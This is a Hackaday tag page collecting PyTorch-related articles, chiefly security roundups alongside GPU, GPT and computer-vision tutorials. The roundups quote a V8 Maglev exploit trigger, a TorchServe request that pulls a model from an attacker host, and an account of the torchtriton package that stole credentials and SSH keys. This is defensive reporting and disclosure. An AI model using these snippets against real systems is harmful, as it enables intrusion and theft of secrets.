pytorch – Hackaday
https://hackaday.com (Fresh hacks every day)

Import GPU: Python Programming with CUDA
https://hackaday.com/2025/02/25/import-gpu-python-programming-with-cuda/ (26 Feb 2025)

Every few years or so, a development in computing results in a sea change and a need for specialized workers to take advantage of the new technology. Whether that’s COBOL in the 60s and 70s, HTML in the 90s, or SQL in the past decade or so, there’s always something new to learn in the computing world. The introduction of graphics processing units (GPUs) for general-purpose computing is perhaps the most important recent development in the field, and if you want to develop some new Python skills to take advantage of it, take a look at this introduction to CUDA, which allows developers to use Nvidia GPUs for general-purpose computing.

Of course CUDA is a proprietary platform and requires one of Nvidia’s supported graphics cards to run, but assuming that barrier to entry is met, it’s not too much more effort to use it for non-graphics tasks. The guide takes a closer look at the open-source library PyTorch, which allows a Python developer to quickly get up to speed with the features of CUDA that make it so appealing to researchers and developers in artificial intelligence, machine learning, big data, and other frontiers in computer science. The guide describes how threads are created, how they move through the GPU and work together with other threads, how memory can be managed on both the CPU and GPU, how CUDA kernels are created, and how everything else involved is managed, largely through the lens of Python.
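
To get a feel for what that looks like in practice, here’s a minimal PyTorch sketch (our own example, not code from the linked guide) that moves a computation onto a CUDA device when one is available:

import torch

# Pick the GPU if CUDA is available, otherwise fall back to the CPU
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

# Allocate two large matrices directly in device memory
a = torch.randn(4096, 4096, device=device)
b = torch.randn(4096, 4096, device=device)

# The matrix multiply runs as CUDA kernels on the GPU (or as CPU code otherwise)
c = a @ b

# Copy the result back to host memory only when it's needed
print(c.sum().item(), "computed on", device)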

Getting started with something like this is almost a requirement to stay relevant in the fast-paced realm of computer science, as machine learning has taken center stage in almost everything related to computers these days. It’s worth noting that, strictly speaking, an Nvidia GPU is not required for GPU programming like this; AMD has a GPU computing platform called ROCm, but despite being open source it still trails Nvidia in adoption and arguably in performance as well. Some other learning tools for GPU programming we’ve seen in the past include this puzzle-based tool which illustrates some of the specific problems GPUs excel at.

This Week in Security: Browser Exploits, Play Protect, and Turn ON your Firewall!
https://hackaday.com/2023/10/20/this-week-in-security-browser-exploits-play-protect-and-turn-on-your-firewall/ (20 Oct 2023)

Google Chrome has done a lot of work on JavaScript performance, pushing the V8 engine to more and more impressive feats. Recently, that optimization gained one more piece, the Maglev compiler, which sits between Sparkplug and TurboFan as a mid-tier optimization step. With a Just In Time (JIT) system, the time saved by optimizing code has to be carefully weighed against the time the optimization itself costs, and Maglev is another tool in that endless hunt for speed. And with anything this complicated, there’s the occasional flaw found in the system. And of course, because we’re talking about it here, it’s a security vulnerability that results in Remote Code Execution (RCE).

The trick is to use Maglev’s optimization against it. Set up a pair of classes, such that B extends A. Calling new B() results in an attempt to use the constructor from A, which works because the compiler checks that the constructors match before doing so. There’s another way to call a constructor in JS, something like Reflect.construct(B, [], Array);. This calls the B constructor, but indicates that the constructor should return an Array object. You may notice there’s no array in the A class below. Tricking the compiler into using the parent class constructor in this fashion results in the array being uninitialized, and whatever happens to be in memory will set the length of the array.

class A {}

var x = Array;

class B extends A {
  constructor() {
    x = new.target;
    super();
  }
}
function construct() {
  var r = Reflect.construct(B, [], x);
  return r;
}
// Call repeatedly so the JIT compiles and optimizes construct()
for (let i = 0; i < 2000; i++) construct();
//-----------------------------------------
//Trigger garbage collection to fill the free space of the heap
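// (gcSize is assumed to be some large allocation size; the excerpt doesn't define it)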
new ArrayBuffer(gcSize);
new ArrayBuffer(gcSize);

corruptedArr = construct();  // length of corruptedArr is 0, try again...
corruptedArr = construct();  // length of corruptedArr takes the pointer of an object, which gives a large value

The trick here is to set up several data structures together so the uninitialized array can be used to corrupt the other objects, giving arbitrary read and write of the compiler heap. Shellcode can be loaded in as other data structures, and a function pointer can be overwritten to jump to the shellcode. That’s RCE from simply running JavaScript on a webpage. Thankfully this one was found, reported privately, and finally fixed on August 2nd.

Safari, Too

The Threat Analysis Group from Google did an analysis of an iOS Safari 0-day exploit chain, and it’s got an interesting trick to look at. Safari has added an extra sandbox layer to keep the web renderer engine from interacting with GPU drivers directly. This attack chain contains an extra exploit to make that hop, and it uses Safari Inter-Process Communication (IPC) to do it. The vulnerability is a simple one, a buffer overflow in the GPU process. But the rest of the story is anything but simple.

The rest of the exploit reads like building a ship in a bottle, using the toehold in the rendering process to reach in and set up an exploit in the GPU process. The process is to build an arbitrary read, then an arbitrary write, flip bits to turn off security settings, and then use object deserialization to run NSExpression. The full write-up walks through it all in excruciating detail. It’s notable that iOS security has reached the point of hardening where it takes this much effort to turn an RCE into an actual system exploit.

Play Protect Expands

It’s no great secret that the ease of side-loading apps is one of Android’s best and worst features when compared to the iPhone. It’s absolutely the best, because it allows bypassing the Play Store, running a de-Googled phone, and easily installing dev builds. But with that power comes great ability to install malware. It makes sense — Google scans apps on the Play Store for malware, so the easy way around that problem is to convince users to install malicious APKs directly. And that leads us to this week’s news: Google Play Protect is gaining the ability to review sideloaded apps at install time, and warn the user if something seems particularly off.

It sounds very similar to the approach taken by Windows Defender, though hopefully malicious apps won’t be able to hijack the security process to block legitimate installs. One concerning detail is the radio silence about disabling the feature, either globally or on a per-install basis. The feature preview only shows the options to either scan the app, uploading some details to Google, or cancel the install. Hopefully this will work like visiting an insecure site in Chrome, where an extra click or two is enough to proceed anyway.

Where’s the Firewall?

Earlier this month, researchers at Oligo published a system takeover exploit chain in TorchServe. It’s… a legitimate problem for many TorchServe installs, scoring a CVSS 9.9. And arguably, it’s really not a vulnerability at all. It contains a default that isn’t actually default, and a Server-Side Request Forgery (SSRF) that’s not a forgery. And for all the ups and downs, apparently nobody had the thought that a default ALLOW firewall might be a bad idea. *sigh* Let’s dive in.

PyTorch is a Python library for machine learning, and it’s become one of the rising stars of the AI moment we’re still in the midst of. One of the easiest ways to get PyTorch running for multiple users is the TorchServe project, which is put together with a combination of Python and Java, a detail that will be important in a moment. The idea is that you can load a model into the server, and users can run their queries using a simple REST interface. TorchServe actually has three API interfaces: the normal inference API, a metrics API, and the management API, each on a different port.

The management API doesn’t implement any authentication checks, and the documentation does warn about this, stating that “TorchServe only allows localhost access by default”. It turns out that this statement is absolutely true: TorchServe binds that interface to 127.0.0.1 by default. While the Oligo write-up gets that technicality wrong, there is a valid point to be made that some of the example configs bind the management interface to 0.0.0.0. Docker is a different animal altogether, by the way. Binding to 127.0.0.1 inside a Docker container blocks all traffic from outside the container, so the observation that the official TorchServe Docker image uses 0.0.0.0 is a bit silly. So to recap, it’s bad to put insecure configuration in your documentation. The TorchServe project has worked to fix this.

Next, the second vulnerability comes with a CVE! CVE-2023-43654 is an SSRF, a weakness where an attacker can manipulate a remote server into sending HTTP requests to unintended places. And technically, that’s true. A request to the management API can specify where the server should attempt to download a new inference model. There is an allowed_urls setting that specifies how to filter those requests, and by default it allows any file or HTTP/S request. Could that be used to trigger something unintended on an internal network? Sure. Should the allowed_urls setting default to allowing anything? Probably not. Is this issue on the backend management API actually an SSRF worthy of a CVSS 9.8 CVE? Not even close.
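
To make the mechanics concrete, here’s roughly what registering a model against an exposed management API looks like, using the documented POST /models endpoint on the default management port 8081. The host and model URL are placeholders, and this is a sketch of the documented behavior rather than a tested exploit:

import requests

# Hypothetical host running TorchServe with the management API reachable
MANAGEMENT_API = "http://torchserve.example.com:8081"

# The management API accepts a URL from which to fetch a new model archive.
# With the default allowed_urls, any file or HTTP/S location is accepted,
# which is the behavior Oligo flagged as an SSRF.
resp = requests.post(
    f"{MANAGEMENT_API}/models",
    params={"url": "https://attacker.example.com/malicious-model.mar"},
)
print(resp.status_code, resp.text)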

And the last issue, CVE-2022-1471, is a Java deserialization RCE. This one is actually a problem — sort of. The issue is actually in SnakeYAML, and was fixed last year. One of the great disadvantages of using Java is that you have to rebuild the project with manually updated libraries, and TorchServe didn’t bother to pull the fix until now. If your TorchServe server loads an untrusted inference model, this vulnerability leads to RCE. Except, loading an inference model executes arbitrary code by design. So it’s yet another technically correct CVE that’s utterly bogus.

Now, don’t take my tone of disdain as a complete dismissal of the findings. As far as I can tell, there really are “tens of thousands of IP addresses” exposing the TorchServe management interface to the Internet. That really is a problem, and good on the researchers at Oligo for laying the problem out clearly. But there’s something notably missing from the write-up and its recommendations: configuring the firewall! Why is anybody running a server with a public IP with a default ALLOW firewall?

Bits and Bytes

Forget the Ides of March, beware the Cisco. This week we got news that there’s a 0-day vulnerability being exploited in the wild, in IOS XE. That firmware can run on switches, routers, access points, and more. And just a couple days ago, a staggering 40,000+ devices were found to be compromised. If you have the misfortune of running a Cisco IOS XE device and have the HTTP interface exposed online, or to any untrusted traffic, just assume it’s compromised. Oof.

The Hello World of GPT?
https://hackaday.com/2023/04/10/the-hello-world-of-gpt/ (11 Apr 2023)

Someone wants to learn about Arduino programming. Do you suggest they blink an LED first? Or should they go straight for a 3D laser scanner with galvos, a time-of-flight sensor, and multiple networking options? Most of us need to start with the blinking light and move forward from there. So what if you want to learn about the latest wave of GPT — generative pre-trained transformer — programs? Do you start with a language model that looks at thousands of possible tokens in large contexts? Or should you start with something simple? We think you should start simple, and [Andrej Karpathy] agrees. He has a workbook that makes a tiny GPT that can predict the next bit in a sequence. It isn’t any more practical than a blinking LED, but it is a manageable place to start.

The simple example starts with a vocabulary of two. In other words, characters are 1 or 0. It also uses a context size of 3, so it will look at 3 bits and use that to infer the 4th bit. To further simplify things, the examples assume you will always get a fixed-size sequence of tokens, in this case, eight tokens. Then it builds a little from there.
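
For a sense of how small this problem really is, here’s a minimal sketch of the same task in PyTorch. To be clear, this is not [Andrej Karpathy]’s notebook code and it isn’t a transformer at all, just a tiny classifier predicting the fourth bit from the previous three, with a made-up majority-vote rule standing in for real training data:

import torch
import torch.nn as nn

torch.manual_seed(0)

# Toy rule for the training data: the next bit is the majority vote of the last three.
# (This rule is only for illustration; the linked workbook uses its own sequences.)
def next_bit(ctx):
    return int(sum(ctx) >= 2)

# Build every possible 3-bit context and its target bit
contexts = [[a, b, c] for a in (0, 1) for b in (0, 1) for c in (0, 1)]
X = torch.tensor(contexts, dtype=torch.float32)
y = torch.tensor([next_bit(ctx) for ctx in contexts])

# A tiny model: 3 input bits -> small hidden layer -> 2 logits ("0" or "1")
model = nn.Sequential(nn.Linear(3, 8), nn.ReLU(), nn.Linear(8, 2))
opt = torch.optim.Adam(model.parameters(), lr=0.05)
loss_fn = nn.CrossEntropyLoss()

for step in range(200):
    opt.zero_grad()
    loss = loss_fn(model(X), y)
    loss.backward()
    opt.step()

# Predict the bit that follows the context 1, 0, 1
pred = model(torch.tensor([[1.0, 0.0, 1.0]])).argmax(dim=1).item()
print("predicted next bit:", pred)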

The notebook uses PyTorch to create a GPT, but since you don’t need to understand those details, the code is all collapsed. You can, of course, expand it and see it, but at first, you should probably just assume it works and continue the exercise. You do need to run each block of code in sequence, even if it is collapsed.

The GPT is trained on a small set of data over 50 iterations. There should probably be more training, but this shows how it works, and you can always do more yourself if you are so inclined.

The real value here is to internalize this example and do more yourself. But starting from something manageable can help solidify your understanding. If you want to deepen your understanding of this kind of transformer, you might go back to the original paper that started it all.

All this hype over AI and GPT-related things is really just… well… hype. But there is something there. We’ve talked about what it might mean. The statistical nature of these things, by the way, is exactly how other software can figure out if your term paper was written by an AI.

This Week in Security: Lastpass Takeaway, Bitcoin Loss, and PyTorch
https://hackaday.com/2023/01/06/this-week-in-security-lastpass-takeaway-bitcoin-loss-and-pytorch/ (6 Jan 2023)

We mentioned the LastPass story in closing a couple weeks ago, but details were still a bit scarce. The hope was that LastPass would release more transparent information about what happened, and how many accounts were accessed. Unfortunately it looks like the December 22nd news release is all we’re going to get. For LastPass users, it’s time to make some decisions.

To recap, an attacker used information from the August 2022 breach to target a LastPass employee with a social engineering ploy. This succeeded, and the attacker managed to access LastPass backups, specifically a customer account database and customer vaults. There has been no official word on how many users’ data were included, but the indication is that it was the entire dataset. And to make matters worse, the vaults are only partially encrypted: saved URLs were exposed as plain text to the attacker, though usernames and passwords are still encrypted using your master password.

So what should a LastPass user do now? It depends. We can assume that whoever has the LastPass vault data is currently throwing every password list available at it. If you used a weak password — derived from words in any language or previously compromised — then it’s time to change all of your passwords that were in the vault. They are burned.

Whether you stick with LastPass or go to another solution, it’s just a matter of time until your vault is cracked. Making matters worse, some old LastPass accounts only use 5,000 rounds of PBKDF2 (Password-Based Key Derivation Function) hashing. New accounts are set to use over 100,000 iterations, but some older accounts could still use the old setting. The result is that an attack against the encrypted vault runs much faster. The number of iterations is almost certainly in the stolen data, so these accounts will likely be tested first. If you’re a long-time user, change all of the passwords stored in the vault.
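
If you want to see for yourself why the iteration count matters, Python’s standard library exposes PBKDF2 directly. A quick sketch, with parameters that are illustrative rather than LastPass’s exact scheme:

import hashlib, os, time

password = b"correct horse battery staple"
salt = os.urandom(16)  # per-user random salt

for iterations in (5_000, 100_000):
    start = time.perf_counter()
    key = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    elapsed = time.perf_counter() - start
    print(f"{iterations:>7} iterations: {elapsed * 1000:.1f} ms per guess")

The 100,000-iteration derivation takes roughly twenty times longer per guess, which is exactly the slowdown an attacker grinding through password candidates has to eat.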

There is some good news. The vaults use a salt to go with the passwords — additional data that gets folded into the PBKDF2 function. It means that the password cracking procedure has to be done individually per user. If you’re just another uninteresting user, you might not ever get targeted for cracking. But if you might be interesting, or have URLs in your vault that look interesting, there’s likely a higher chance of being targeted. And unfortunately, those URLs were stored in plain text.

So how does the math stack up? Lucky for us, [Wladimir Palant] ran the numbers. A minimum complexity password, using the 2018 rules for a LastPass password, results in 4.8×10^18 possible password combinations. An RTX 4090 can sustain in the ballpark of 1.7 million guesses per second against an account using only 5,000 iterations of PBKDF2, or 88,000 guesses per second against a properly secured account. That works out to 44,800 years to break open a weakly-hashed vault, and 860,000 years for a properly secured one, assuming a single RTX 4090 working on it. Some very rough math on the size of a three-letter-agency datacenter would suggest that devoting the entirety of one of these datacenters to the task would crack the less secure vault in under 4 months. With an account using the full security settings, this rises to nearly six years. Keep in mind, this approach is a best-case scenario for an attacker, and represents devoting a $1.5 billion datacenter to the task for an extended period. But it also assumes you chose your password randomly.
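
The back-of-the-envelope math is easy to check yourself. A sketch that assumes, as the figures above imply, the average case of searching half the keyspace:

keyspace = 4.8e18          # minimum-complexity LastPass password combinations
seconds_per_year = 3600 * 24 * 365

for label, guesses_per_second in (("5,000 PBKDF2 iterations", 1.7e6),
                                  ("100,000+ PBKDF2 iterations", 88_000)):
    avg_guesses = keyspace / 2                     # expect to hit it halfway through
    years = avg_guesses / guesses_per_second / seconds_per_year
    print(f"{label}: about {years:,.0f} years on one RTX 4090")

Running that reproduces the roughly 44,800-year and 860,000-year figures quoted above.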

But here’s the rub: If the risk is enough to push you to action, it’s not enough to change your LastPass password. Whether you stay with LastPass or move to another solution, you’ll need to change the master password first, and then go through the grueling process of changing every password in your LastPass vault. This whole mess was certainly a failing on the part of LastPass, and their post-incident reporting leaves something to be desired in terms of transparency. Storing the URL associated with each saved password unencrypted is unfortunate. But the central tenet, that not even LastPass can access your saved passwords, seems to have held up.

Bitcoin Hacker Hacked

Luke Dashjr is a Bitcoin Core developer and the primary signer of the Bitcoin Knots software, and he has suffered a major security breach. This may be a follow-on incident from a November physical attack, where someone managed to reboot his co-located server from a flash drive and install a backdoor. That one was caught, and the malware was seemingly removed. Luke lost a total of about 200 bitcoin, out of both his active (hot) and offline (cold) wallets. He’s treating this as a total compromise, and has warned that his PGP key should be suspect as well. That means recent releases of Bitcoin Knots should be suspect, too.

There have been several theories floated, everything from a “boating accident” to avoid tax liability, to a known problem with random number generation on the Talos system he uses (CVE-2019-15847). None of this seems quite as likely as the idea that this was a missed rootkit on the compromised server, and lateral movement back into [Luke]’s home network. Either way, it’s a terrible mess, and we’re hoping for a positive resolution.

PyTorch Nightly Compromise

The PyTorch-nightly package was hit with a dependency confusion attack, active between December 25th and December 30th. The issue here is that PyTorch hosts a torchtriton package as part of its nightly repo, and that package name wasn’t claimed on PyPI. So all someone had to do was come along and upload a package under that name, and presto: because pip gives no special preference to the extra index the nightly builds install from, any new pip install of PyTorch-nightly grabbed the PyPI version instead. The malicious package vacuums up system data, like current nameservers, hostname, username, working directory, and environment variables, and sends those to h4ck[dot]cfd (Archive link). That bit isn’t so bad, though environment variables are sure to include auth tokens. The kicker is that bash history, /etc/hosts, /etc/passwd, ~/.gitconfig, ~/.ssh, and the first 1000 files in the home directory are all packaged up and uploaded, too. On a modern system, the passwd file doesn’t actually contain any password hashes, but the .ssh folder may very well contain private SSH keys. Yikes.

Now, the developer behind this bogus package has been found, and claims that this was intended to be security research, promising that all data will be deleted. The data was supposedly collected to positively identify each victim, presumably for the purpose of collecting bug bounties. This has some element of believability, but really doesn’t matter, as any secrets leaked in this incident need to be revoked regardless. The silver lining is that no malicious code runs simply by installing the package; a Python script would need to do an explicit import triton to trigger the payload. The PyTorch project has renamed the package to pytorch-triton, and reserved that project name on PyPI to avoid a repeat incident.
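
That distinction matters because Python packages can run arbitrary code the moment they are imported. Here’s a harmless sketch of the mechanism — this is not the torchtriton payload, just an illustration of why import triton is the trigger:

# __init__.py of a hypothetical package named "triton"
# Anything at module top level executes as soon as the package is imported.
import getpass
import os
import socket

collected = {
    "hostname": socket.gethostname(),
    "username": getpass.getuser(),
    "cwd": os.getcwd(),
    "env_var_names": sorted(os.environ.keys()),
}

# The real payload shipped data like this (plus files) off to an external host;
# here we only print it locally to show how early in the process the code runs.
print("import-time side effect:", collected)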

Mapping Vulnerable Citrix Installs

There have been a couple of critical vulnerabilities fixed recently in Citrix ADC and Citrix Gateway, one of which prompted a notice from the NSA that an APT (Advanced Persistent Threat) was actively compromising systems with the bug. The fixed version numbers are known, and that made researchers at Fox-IT, part of NCC Group, wonder: is there a way to determine the release version of a Citrix device from the pre-authentication HTTP response? Spoiler: there is. The /vpn/index.html endpoint contains a hash that seems to vary between release versions. The only trick left was to find a quick way to map the hash back to the version.
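
Once you have a hash-to-version table, checking a single device is only a few lines of Python. A rough sketch, with the caveat that exactly where the hash appears in the page is an assumption on our part (the Fox-IT write-up pins it down), and the target host and mapping entry below are placeholders:

import re
import requests

# Hypothetical mapping from page hash to Citrix release, built up the way the
# researchers did: spin up known versions and record the hash each one serves
KNOWN_HASHES = {
    "0123456789abcdef0123456789abcdef": "example release 13.0-88.x",
}

target = "https://citrix-gateway.example.com"
page = requests.get(f"{target}/vpn/index.html", verify=False, timeout=10).text

# Assumption: the version-specific hash shows up as a long hex token somewhere in
# the page source; collect candidates and look them up against the known mapping
for candidate in set(re.findall(r"[0-9a-f]{32}", page)):
    print(candidate, "->", KNOWN_HASHES.get(candidate, "unknown version"))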

Enter Google’s Cloud Marketplace, which has a one-click option to spin up a new Citrix virtual machine. One SSH session later confirmed the version and corresponding hash. That’s one down. Also part of Google’s service is a zip file that has information about older versions, including image names that can be used to download previous versions as a qcow2 virtual disk image — easy enough to grab the hash and version number from there. Between these images and the Citrix download page, quite a few of the known hashes were identified, but strangely, there are some hashes observed in the wild that didn’t seem to line up with a known release. By finding a specific read-only file that is also accessible remotely, it’s possible to get an accurate timestamp on when a given firmware was built. That fills in the gaps on the known version numbers, and let them chart out exactly what versions were showing up in the wild.

Because the hash was part of the data collected by scanning services like Shodan, it’s possible to look at the history of installed versions, as well as the current state. There’s a very noticeable change in the deployed versions, nicely corresponding to the NSA warning. Even at that, there are many deployed Citrix servers that still appear to be running vulnerable firmware, though the details of the deployment may mean they are not in imminent danger. It’s a very interesting look at how we end up with statistics like these.

Bits and Bytes

Synology’s VPN server has a critical vulnerability, CVE-2022-43931, with a CVSS score of 10, that allows an unauthenticated attacker to execute arbitrary commands. Patched releases are available. The flaw itself is an out-of-bounds write in the Remote Desktop service, so there is some hope that this vulnerable service isn’t widely exposed to the open Internet.

Here’s the exploit you didn’t know you needed, breaking out of the Lua interpreter to get shellcode execution. The trick here is to encode shellcode as numbers, then fool the runtime into an unaligned access that jumps program execution into the data. Another fun trick is that the target Lua interpreter will let you run Lua bytecode and trusts it just like regular Lua code. So what’s the purpose of all this? Sometimes the fun is in the journey.

What do you get when bored security researchers decide to poke at the mobile app for electric scooters? Lots of mysteriously honking and flashing scooters. And when those same researchers up the ante and try to make cars honk? A truly impressive list of remote vulnerabilities in vehicles of all brands. From live GPS tracking, to turning on lights, unlocking doors, and even remotely starting vehicles, [Sam Curry] and his band of merry hackers made it happen. To the credit of the many vendors that were affected, pretty much every vulnerability ends with “they fixed it right away.”

Edging Ahead When Learning On The Edge
https://hackaday.com/2022/06/21/edging-ahead-when-learning-on-the-edge/ (21 Jun 2022)

“With the power of edge AI in the palm of your hand, your business will be unstoppable.”

That’s what the marketing seems to read like for artificial intelligence companies. Everyone seems to have cloud-scale AI-powered business intelligence analytics at the edge. It sounds impressive, but we’re not convinced that marketing mumbo jumbo means anything. So what does AI on edge devices look like these days?

Being on the edge just means that the actual AI evaluation and maybe even fine-tuning runs locally on a user’s device rather than in some cloud environment. This is a double win, both for the business and for the user. Privacy can more easily be preserved as less information is transmitted back to a central location. Additionally, the AI can work in scenarios where a server somewhere might not be accessible or provide a response quickly enough.

Google and Apple have their own AI libraries, ML Kit and Core ML, respectively. There are tools to convert Tensorflow, PyTorch, XGBoost, and LibSVM models into formats that Core ML and ML Kit understand. But other solutions try to provide a platform-agnostic layer for training and evaluation. We’ve also previously covered Tensorflow Lite (TFL), a trimmed-down version of Tensorflow, which has matured considerably since 2017.

For this article, we’ll be looking at PyTorch Live (PTL), a slimmed-down framework for adding PyTorch models to smartphones. Unlike TFL (which can run on an RPi and in a browser), PTL is focused entirely on Android and iOS and offers tight integration. It uses a React Native-backed environment, which means that it is heavily geared toward the Node.js world.

No Cloud Required

Right now, PTL is very early. It runs on macOS (though no Apple Silicon support), but Windows and Linux compatibility is apparently forthcoming. It comes with a handy CLI that makes starting a new project relatively painless. After installing and creating a new project, the experience is smooth, with a few commands taking care of everything. The tutorial was straightforward, and soon we had a demo that could recognize numbers.

It was time to take the tutorial further and create a custom model. Using the EMNIST letters dataset, we trained a resnet9 model with help from a handy GitHub repo. Once we had a model, it was simple enough to use the PyTorch utilities to export it to the lite environment. With some tweaks to the code (which live-reloads on the simulator), it recognized characters instead of numbers.
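
The export step itself is only a few lines of standard PyTorch. Here’s a sketch of the usual mobile/lite export path; the model and input shape below are placeholders rather than our exact EMNIST setup:

import torch
from torch.utils.mobile_optimizer import optimize_for_mobile
from torchvision.models import resnet18

# Placeholder model; in our case this was a resnet9 trained on EMNIST letters
model = resnet18(num_classes=26)
model.eval()

# Trace the model with an example input, optimize it for mobile, and save it
# in the lite-interpreter format that PyTorch Live / PyTorch Mobile loads
example = torch.randn(1, 3, 224, 224)
traced = torch.jit.trace(model, example)
optimized = optimize_for_mobile(traced)
optimized._save_for_lite_interpreter("model.ptl")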

We suspect someone a little more steeped in the machine learning world would be able to take this further than we did. PTL has other exciting demos, such as on-device speech recognition and live video segmentation and recognition. Overall the experience was painless, and the scenarios we tried were relatively easy to implement.

If you’re already in the smartphone React Native world, PTL seems simple to integrate and use. Outside of that, a lot is left unsupported. Tensorflow Lite was similarly constrained when we first covered it, and has since matured into a powerful library with many supported platforms and features. Ultimately, we’ll see what PyTorch Live grows into. There’s already support for GPUs and neural engines in the beta branch.

Putting Perseverance Rover’s View Into Satellite View Context
https://hackaday.com/2021/03/30/putting-perseverance-rovers-view-into-satellite-view-context/ (30 Mar 2021)

It’s always fun to look over aerial and satellite maps of places we know, seeing a perspective different from our usual ground-level view. We lose that context when it’s a place we don’t know by heart. Such as, say, Mars. So [Matthew Earl] sought to give Perseverance rover’s landing video some context by projecting it onto orbital imagery from ESA’s Mars Express. The resulting video (embedded below the break) is a fun watch alongside the technical writeup Reprojecting the Perseverance landing footage onto satellite imagery.

Some telemetry of rover position and orientation was transmitted live during the landing process, with the rest recorded and downloaded later. Surprisingly, none of that information was used for this project, which was based entirely on video pixels. This makes the results even more impressive and the techniques more widely applicable to other projects. The foundational piece is SIFT (Scale Invariant Feature Transform), one of many tools in the OpenCV toolbox. SIFT found correlations between Perseverance’s video frames and the Mars Express orbital image, feeding into a processing pipeline written in Python, with results rendered in Blender.
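
The core of that kind of pipeline is standard OpenCV. Here’s a rough sketch (file names are placeholders, and this is our simplification rather than [Matthew]’s actual code) of matching SIFT features between a video frame and the orbital image and recovering a homography:

import cv2
import numpy as np

# Placeholder inputs: one frame from the descent video and the orbital image
frame = cv2.imread("perseverance_frame.png", cv2.IMREAD_GRAYSCALE)
orbital = cv2.imread("mars_express_orbital.png", cv2.IMREAD_GRAYSCALE)

# Detect SIFT keypoints and descriptors in both images
sift = cv2.SIFT_create()
kp1, des1 = sift.detectAndCompute(frame, None)
kp2, des2 = sift.detectAndCompute(orbital, None)

# Match descriptors and keep the good matches using Lowe's ratio test
matcher = cv2.BFMatcher()
matches = matcher.knnMatch(des1, des2, k=2)
good = [m for m, n in matches if m.distance < 0.75 * n.distance]

# Estimate the homography that maps frame pixels onto the orbital image
src = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)
dst = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)
H, mask = cv2.findHomography(src, dst, cv2.RANSAC, 5.0)
print("homography:\n", H)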

While many elements of this project sound enticing for applications in robot vision, there are a few challenges touched upon in the “Final Touches” section of the writeup. The falling heatshield interfered with automated tracking, implying this process will need help to properly understand dynamically changing environments. Furthermore, it does not seem to run fast enough for a robot’s real-time needs. But at first glance, these problems are not fundamental. They merely await some motivated people to tackle them in the future.

This process bears some superficial similarities to projection mapping, which is a category of projects we’ve featured on these pages. Except everything is reversed (camera instead of video projector, etc.) making the math an entirely different can of worms. But if projection mapping sounds more to your interest, here is a starting point.

[via Dr. Tanya Harrison @TanyaOfMars]

OpenSource GUI Tool For OpenCV And DeepLearning
https://hackaday.com/2020/02/28/opensource-gui-tool-for-opencv-and-deeplearning/ (29 Feb 2020)

AI and deep learning for computer vision projects have come to the masses. This can be attributed partly to the community projects that help ease the pain for newbies. [Abhishek] contributes one such project called Monk AI, which comes with a GUI for transfer learning.

Monk AI is essentially a wrapper for computer vision and deep learning experiments. It lets users fine-tune deep neural networks using transfer learning, and is written in Python. Out of the box it supports Keras and PyTorch, and with a few lines of code you can get started with your very first AI experiment.
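
For reference, this is roughly what a transfer-learning setup looks like in plain PyTorch; a generic sketch (assuming a recent torchvision), not Monk AI’s actual API:

import torch
import torch.nn as nn
from torchvision import models

# Start from a network pre-trained on ImageNet
model = models.resnet18(weights=models.ResNet18_Weights.DEFAULT)

# Freeze the pre-trained feature extractor
for param in model.parameters():
    param.requires_grad = False

# Replace the final layer so it predicts our own classes (say, 5 of them),
# and train only this new layer on the new dataset
model.fc = nn.Linear(model.fc.in_features, 5)
optimizer = torch.optim.Adam(model.fc.parameters(), lr=1e-3)

Wrappers like Monk AI automate exactly this kind of boilerplate, plus the data loading and training loop around it.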

[Abhishek] also has an Object Detection wrapper (GitHub) with some useful examples, as well as a Monk GUI (GitHub) tool that looks similar to the tools available in commercial packages for running training and inference experiments.

The documentation is a work in progress, though it seems like an excellent concept to build on. We need more tools like these to help more people get started with deep learning. Hardware such as the Nvidia Jetson Nano and Google Coral is affordable and facilitates learning and experimentation.
